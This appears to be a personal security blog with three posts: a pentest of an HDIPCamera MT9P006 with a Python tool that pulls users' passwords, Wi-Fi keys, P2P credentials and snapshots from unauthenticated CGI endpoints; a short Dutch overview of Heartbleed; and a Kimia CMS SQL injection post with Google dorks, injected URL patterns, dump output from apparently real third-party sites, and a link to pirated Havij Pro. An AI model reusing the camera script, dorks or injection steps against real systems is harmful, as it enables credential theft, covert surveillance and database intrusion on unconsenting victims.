Exploiting HDIPCamera MT9P006

I pentested a camera, finding numerous vulnerabilities.
Product info:
HDIPCamera MT9P006
Version 1.0.1.2 (Dec 4 2015)
1/2.5-Inch 5 Mp CMOS Digital Image Sensor
Boardtype: 5300
sensortype: mt9p006
found in applications like:
• Digital still cameras
• Digital video cameras
• PC cameras
• Converged DSCs/camcorders
• Cellular phones
• PDAs
Let’s have a look. 😉
by just examining the source I found a few unprotected cgi requests.
A few importants cgi request can be used without any authorisation.

First getting some basic info

var serialNum="VVVIPCxxxxxxxxxxxx-xxxxxxxxxxxxx";
var model="RT_IPC"; var hardVersion="5300-mt9p006";
var softVersion="V2.3.5.2505-S50-SMA-B20151204B";
var ipcname="IPCAM";
var startdate="2016-8-30 21:56:44";
var runtimes="0 day, 1:58";
var sdstatus="out";
var sdfreespace="0 ";
var sdtotalspace="0 ";
var builddate="Dec 4 2015 ";
var productmodel="null";
var vendor="RTJ";
var swver="";
var hwver="";
var mppver="mpp";

P2P info

var p2p_enable = "1";
var p2p_id = "PPIV-xxxxx-WZDZZ";
var p2p_pwd = "xxx";

Wifi info

var wifissid = "xxx";
var wifikeytype = "3";
var wifiwhichkey = "0";
var wifikey="xxxxxxxxxxxxxxxx";
var wifienable="0";
var wifimac="xx:xx:xx:xx:xx:xx";
var wifienable="0";
var linkstatus="0";
var linkssid="";
var wifimode="";

rtsp info

var rtsplisnport="554";
var onvif_http_port="1018";
var rtsp_user_verify="0";

User info (Including passwords)

var name0="admin";
var password0="admin";
var authLevel0="255";
var name1="guest";
var password1="guest";
var authLevel1="3";
var name2="xxx";
var password2="xxx";
var authLevel2="3";
var name3="xxx";
var password3="xxx";
var authLevel3="3";
var name4="";
var password4="";
var authLevel4="3";
var name5="";
var password5="";
var authLevel5="3";
var name6="";
var password6="";
var authLevel6="3";
var name7="";
var password7="";
var authLevel7="3";
var name8="";
var password8="";
var authLevel8="0";
var name9="";
var password9="";
var authLevel9="0";
It’s getting even better.
A world readable url with all the snapshots taken.
Ow wait.. let’s make some snapshots..
outputs:
var path=”/tmpfs/snap_tmpfs/20160831/IMG001/IMG_chn0_TIMER_MNG_20160831230808_001.jpg”
.. a freshly made snapshot.
I made a python script to make use of these cgi’s and outputs all the info.
And to make a snapshot and save it to local.
#!/bin/python

# Quick & Dirty tool
# Get all the info from the IPcam 5300 MT9P006
#
# Use commandline parameters to retrieve all kinds of info
#
# usage for all the info
# python IPcam_5300-mt9p006.py --ip <ip> --snapshot --getp2p --getwifi --getrtsp --getusers

import urllib
import urllib2
import re
import argparse

p2p="/cgi-bin/p2p.cgi?cmd=p2p.cgi&-action=get"
wifi="/cgi-bin/getwifiattr.cgi"
rtsp="/cgi-bin/hi3510/getrtsplisnport.cgi"
snap="/web/cgi-bin/hi3510/param.cgi?cmd=snap"
snap_dir="/tmpfs/snap_tmpfs/"
users="/web/cgi-bin/hi3510/param.cgi?cmd=getuser"

def get_param():
    print "./IPcam_5300-mt9p600.py -h for cmd options"
    try:
        parser = argparse.ArgumentParser()
        parser.add_argument("--ip", dest="ip", default="", help="ip adres", required=True)
        parser.add_argument("--snapshot", dest="snapshot", action="store_true", help="make and download snapshot")
        parser.add_argument("--getp2p", dest="getp2p", action="store_true", help="get p2p info (incl. password)")
        parser.add_argument("--getwifi", dest="getwifi", action="store_true", help="get wifi info (incl. password)")
        parser.add_argument("--getrtsp", dest="getrtsp", action="store_true", help="get rtsp info")
        parser.add_argument("--getusers", dest="getusers", action="store_true", help="get user info (incl. passwords)")
        args = parser.parse_args()
        return args
    except IOError, msg:
        parser.error(str(msg))

def main():
    params = get_param()
    if params.snapshot:
        # call cgi to make snapshot and save to local drive
        print "make and download snapshot\n"
        req = urllib2.Request("http://"+params.ip+snap)
        url_data = urllib2.urlopen(req).read()
        match = re.search(r"/(.*)", url_data)
        snapfile_path = match.group(0)
        # remove last 2 char " and \n
        snapfile_path = snapfile_path[:-2]
        match = re.search(r"IMG_(.*).jpg", snapfile_path)
        snap_filename = match.group(0)
        print "Snap file url: %s" % snapfile_path
        print "Save output to: %s " % snap_filename
        cmd="http://" + params.ip + snapfile_path
        req1 = urllib2.Request(cmd)
        f = open(snap_filename, "wb")
        f.write(urllib2.urlopen(req1).read())
        f.close()

    if params.getp2p:
        print "Get p2p info"
        req = urllib2.Request("http://" + params.ip + p2p)
        url_data = urllib2.urlopen(req).read()
        print url_data
    if params.getwifi:
        print "Get wifi info"
        req = urllib2.Request("http://" + params.ip + wifi)
        url_data = urllib2.urlopen(req).read()
        print url_data
    if params.getrtsp:
        print "Get rtsp info"
        req = urllib2.Request("http://" + params.ip + rtsp)
        url_data = urllib2.urlopen(req).read()
        print url_data
    if params.getusers:
        print "Get users info"
        req = urllib2.Request("http://" + params.ip + users)
        url_data = urllib2.urlopen(req).read()
        print url_data

if __name__ == "__main__":
  main()

					

Heartbleed

Hacking in a heartbeat…..
Wat is er aan de hand?

CVE-2014-0160

Heartbeat is een extensie van OpenSSL om verbindingen te behouden.
Nu blijkt hier een bug in te zitten, die bij de handshake teveel informatie teruggeeft,
waaronder certificaten, geheugen dump van de site, cookies, sessies, enz, enz (tot 64kb).
Hij vraagt bevestiging van de verbinding, maar krijgt een handvol willekeurige info van het geheugen van de server.

Het blijkt zo eenvoudig te zijn, dat elke scriptkiddie deze bug kan exploiteren.

Er zijn meerdere scripts te vinden op het net, alsmede test sites om te
kijken of een website kwetsbaar is.
o.a. dropbox, yahoo en openssl site zelf zijn kwetsbaar.
1 van de test sites: https://heartbleed.hostgator.com

Er worden getallen genoemd van 500.000 kwetsbare websites,
niet gepatchte websites zijn kwetsbaar, blokkeren wil niet (hooguit met SNORT – had al gezien dat zij een een toevoegingen hebben gemaakt).

NMAP, Metasploit en Nessus hebben alle 3 al een plugin toegevoegd aan hun werkomgeving om dit te kunnen testen.

Oplossingen worden ook geboden, nieuwste update van OpenSSL biedt de oplossing, lukt dit niet dan moet alle software draaiende opnieuw gecompileerd worden exclusief deze extensie.

Nu blijkt deze bug al meer dan 2 jaar te bestaan en onduidelijk is of deze al langer misbruikt werd (NSA?). maar nu in ieder geval op grote schaal.

— to be continued!
Ik zal tzt deze blogpost gaan uitbereiden met voorbeelden, POC’s, en advies om dit te voorkomen.

You have been warned!

[sqli] Kimia

An old one, but still works fine!

http://packetstormsecurity.org/files/view/101202/kimia-sql.txt
http://www.securityhome.eu/exploits/exploit_pdf.php?eid=11754170304e409574e5f234.09320930

http://www.victim.com/image-details.php?id=[SQL]
http://www.victim.com/alert_article.php?id=[SQL]
http://www.victim.com/news-article.php?id=[SQL]
http://www.victim.com/gallery-list.php?id=[SQL]
http://www.victim.com/newsitem.php?id=[SQL]

first some googling..

google dorks:
inurl:”image-details.php?id=”
inurl:”alert_article.php?id=”
inurl:”news-article.php?id=”
inurl:”gallery-list.php?id=”
inurl:”newsitem.php?id=”

http://<removed for privacy>/gallery-list.php?id=18
http://<removed for privacy>/producer/newsitem.php?id=6
http://<removed for privacy>/article.php?id=159
http://<removed for privacy>/products.php?id=41

ofcourse the makers
http://www.kimia.co.za/newslist.php?interval=10&min=30&newsID=72
This I won’t remove 😉 they are vulnerable themselfs 😛

Target: http://<removed for privacy>
Host IP: <removed for privacy>
Web Server: Apache/2.2.9 (Debian) mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
Powered-by: PHP/5.2.6-1+lenny13
DB Server: MySQL >=5
Resp. Time(avg): 1678 ms
Current User: removed for privacy>
Sql Version: 5.1.49-3~bpo50+1
Current DB:

System User: removed for privacy>
Host Name: <removed for privacy>
Installation dir: /usr/
DB User: @’%’
Data Bases: information_schema
propeo_db1

Target: http://<removed for privacy>
Host IP: <removed for privacy>
Web Server: Apache/2.2.9 (Debian) mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
Powered-by: PHP/5.3.3-7+squeeze3+hetz2
DB Server: MySQL error based
Resp. Time(avg): 542 ms
Current User: @<removed for privacy>
Sql Version: 5.1.49-3~bpo50+1
Current DB: System User: foxanr_1@<removed for privacy>
Host Name: <removed for privacy>
Installation dir: /usr/
DB User: @’%’
Data Bases: information_schema
foxanr_db1

 

Target: http://<removed for privacy>
Host IP: <removed for privacy>
Web Server: Apache/2.2.9 (Debian) mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
Powered-by: PHP/5.3.3-7+squeeze3+hetz2
DB Server: MySQL unknown ver
Resp. Time(avg): 1439 ms
Current User: @<removed for privacy>
Sql Version: 5.1.49-3~bpo50+1
Current DB:

System User: @<removed for privacy>
Host Name: <removed for privacy>
Installation dir: /usr/
DB User: @’%’
Data Bases: information_schema
joymag_db1

Target: http://<removed for privacy>
Host IP: <removed for privacy>
Web Server: Apache/2.2.9 (Debian) mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
Powered-by: PHP/5.3.3-7+squeeze3+hetz2
DB Server: MySQL unknown ver
Resp. Time(avg): 3148 ms
Current User: kimiaa_1@<removed for privacy>
Sql Version: 5.1.49-3~bpo50+1
Current DB: kimiaa_db1
System User: kimiaa_1?dedi110

 

Target: http://<removed for privacy>
Host IP: <removed for privacy>
Web Server: Apache/2.2.9 (Debian) mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
Powered-by: PHP/5.3.3-7+squeeze3+hetz2
DB Server: MySQL unknown ver
Resp. Time(avg): 2508 ms
Current User: @<removed for privacy>
Sql Version: 5.1.49-3~bpo50+1
Current DB: robassu_db1
System User: @<removed for privacy>
Host Name:

table structure:  http://dl.dropbox.com/u/4378489/Forums/evilzone/Kimia_tables.html

Use with Havij Pro 1.15
http://www.ziddu.com/download/17108226/Havij_1.15_Pro.rar.html